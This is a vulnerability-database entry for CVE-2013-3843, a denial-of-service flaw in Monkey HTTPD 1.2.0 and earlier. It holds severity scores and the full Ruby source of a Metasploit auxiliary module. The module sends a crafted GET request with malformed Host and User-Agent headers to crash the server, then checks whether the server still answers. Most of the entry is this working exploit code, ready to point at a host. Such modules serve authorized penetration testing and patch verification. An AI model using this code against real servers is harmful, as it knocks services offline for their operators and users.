Monkey HTTPD Header Parsing Denial of Service (Denial of Service)

2024-08-3100:00:00

dougtko, metasploit.com

packetstormsecurity.com

metasploit

monkey httpd

header parsing

denial of service

http request

segmentation fault

cve 2013-3843

osvdb 93853

bid 60333

tcp

remote

dos

server

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

Confidence

Low

EPSS

0.345

Percentile

97.2%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',  
'Description' => %q{  
This module causes improper header parsing that leads to a segmentation fault  
due to a specially crafted HTTP request. Affects version <= 1.2.0.  
},  
'Author' =>  
[  
'Doug Prostko <dougtko[at]gmail.com>'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2013-3843'],  
['OSVDB', '93853'],  
['BID', '60333']  
],  
'DisclosureDate' => '2013-05-30'))  
  
register_options(  
[  
Opt::RPORT(2001)  
])  
end  
  
def dos  
req = "GET / HTTP/1.1\r\n"  
req << "Host:\r\n\r\nlocalhost\r\n"  
req << "User-Agent:\r\n\r\n"  
  
connect  
sock.put(req)  
disconnect  
end  
  
def is_alive?  
begin  
connect  
rescue Rex::ConnectionRefused  
return false  
ensure  
disconnect  
end  
  
true  
end  
  
def run  
print_status("#{rhost}:#{rport} - Sending DoS packet...")  
dos  
  
print_status("#{rhost}:#{rport} - Checking server status...")  
select(nil, nil, nil, 1)  
  
if is_alive?  
print_error("#{rhost}:#{rport} - Server is still alive")  
else  
print_good("#{rhost}:#{rport} - Connection Refused: Success!")  
end  
end  
end  
`